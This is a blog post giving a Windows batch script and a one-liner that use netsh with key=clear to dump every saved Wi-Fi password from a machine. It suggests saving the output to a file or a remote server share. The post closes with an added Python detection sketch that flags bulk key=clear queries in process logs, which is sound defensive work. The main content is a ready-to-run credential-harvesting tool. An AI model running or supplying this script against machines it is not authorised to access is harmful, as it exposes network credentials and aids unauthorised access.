Monday, August 17, 2015

Dumping Wireless Passwords from Windows Machines (win7 & win8 tested; win10 not tested) using netsh

Here's how to dump all the Wi-Fi passwords from a Windows machine using built-in tools:
Windows 7 - Tested Successfully
Windows 8 - Tested Successfully
Windows 10 - Not Tested

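-=batch file=-
@echo off
rem List the saved profiles; token 4 of each matching line is the profile name.
for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (
    rem Query that profile with the key in clear text; keep only the SSID, Cipher and Key Content lines.
    netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number"
    echo.
)
pause > nul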


How it works:
Running netsh wlan show profiles lists all the wireless profiles for the machine, but it also prints a lot of other garbage that gets in the way. Piping it to find "Profile " cleans that up to only what we want. Notice the space after Profile in the find command. Then we can delimit on the : and space characters to get it down to just the wireless SSIDs. Because space is one of the delimiters, a profile name that contains a space is cut off at its first word.

Now that we have just the SSIDs, aka Profiles in netsh terms, we can query each one for its details. Mostly we're just concerned with SSID, Cipher (encryption) and Key Content (the password). Using findstr we can search for multiple terms in one go. However, the "Number of SSIDs" line also matches, so we use find /v (do not match) to strip that out. Echo. inserts a blank line to keep things readable.

You'll likely want to add some redirects to save the output to a text file, a remote server share, or something else you can hold onto.

-=The one liner =-
I also wrote up a one liner to use in the event you can't run a batch file:

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

This one liner produces nice clean output by first clearing the screen (cls), echoing a blank line (echo.), then running through the same script with the echo feature off, and conveniently turning it back on at the end of the script.
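From the defender's side, both the batch file and the one liner launch netsh once per profile with key=clear on the command line, which shows up in process-creation logs when command lines are recorded. The following detection sketch is an added example, not part of the original post; it assumes records shaped as (host, timestamp, command line), and the hosts, times and profile names are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records; the (host, ISO time, command line) layout is an assumption.
SAMPLE_EVENTS = [
    ("WS-014", "2015-08-17T10:02:11", "netsh wlan show profiles"),
    ("WS-014", "2015-08-17T10:02:12", "netsh wlan show profiles name=HomeNet key=clear"),
    ("WS-014", "2015-08-17T10:02:12", "netsh  WLAN show profile name=\"Cafe Guest\" KEY=clear"),
    ("WS-014", "2015-08-17T10:02:13", "netsh.exe wlan show profiles name=Office key=clear"),
    ("WS-022", "2015-08-17T11:30:00", "netsh wlan show profiles name=Office key=clear"),
    ("WS-022", "2015-08-17T11:45:00", "netsh wlan show interfaces"),
]

# Only the key=clear form reveals Key Content; a plain profile listing does not match.
KEY_CLEAR = re.compile(
    r'\bnetsh(?:\.exe)?"?\s+wlan\s+show\s+profiles?\b[^|&]*\bkey="?clear\b', re.I)
PROFILE = re.compile(r'\bname=(?:"([^"]+)"|(\S+))', re.I)

def key_clear_hits(events):
    """Return (host, time, profile) for each command that asks for a cleartext key."""
    hits = []
    for host, ts, cmdline in events:
        m = KEY_CLEAR.search(cmdline)
        if not m:
            continue
        name = PROFILE.search(m.group(0))
        profile = (name.group(1) or name.group(2)) if name else "*"  # "*": no name= given
        hits.append((host, datetime.fromisoformat(ts), profile))
    return hits

def bulk_dumps(events, min_profiles=3, window=timedelta(seconds=60)):
    """Flag hosts that queried min_profiles distinct profiles inside one time window."""
    per_host = defaultdict(list)
    for host, ts, profile in key_clear_hits(events):
        per_host[host].append((ts, profile))
    flagged = {}
    for host, rows in per_host.items():
        rows.sort()
        for start, _ in rows:
            seen = {p for t, p in rows if start <= t <= start + window}
            if len(seen) >= min_profiles:
                flagged[host] = sorted(seen)
                break
    return flagged

if __name__ == "__main__":
    print(bulk_dumps(SAMPLE_EVENTS))
```

A single key=clear query can be ordinary troubleshooting, so the threshold and window separate that from the loop over every saved profile; tune both to the environment.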